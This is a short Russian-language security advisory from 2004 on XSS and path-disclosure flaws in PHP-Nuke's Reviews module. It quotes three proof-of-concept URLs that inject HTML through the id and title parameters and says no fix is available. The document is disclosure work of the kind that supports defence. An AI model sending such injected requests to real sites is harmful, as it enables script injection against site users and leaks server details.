Security Lab

Несколько уязвимостей в PHP-Nuke

Дата публикации:09.06.2004
Всего просмотров:1631
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: PHP-Nuke 6.x, 7.2, 7.3

Описание: Несколько уязвимостей в проверке правильности входных данных обнаружено в PHP-Nuke в модуле Reviews. Удаленный пользователь может выполнить XSS нападение и определить инсталляционный путь.

1. XSS:

http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='<h1>DarkBicho</h1&title =a

http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='&title=<h1>DarkBicho</h1>
2. Раскрытие пути:
http://localhost/nuke1/modules.php?name=Reviews&rop=showcontent&id='DarkBich o

URL производителя: http://www.phpnuke.org/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Multiple vulnerabilities PHP-Nuke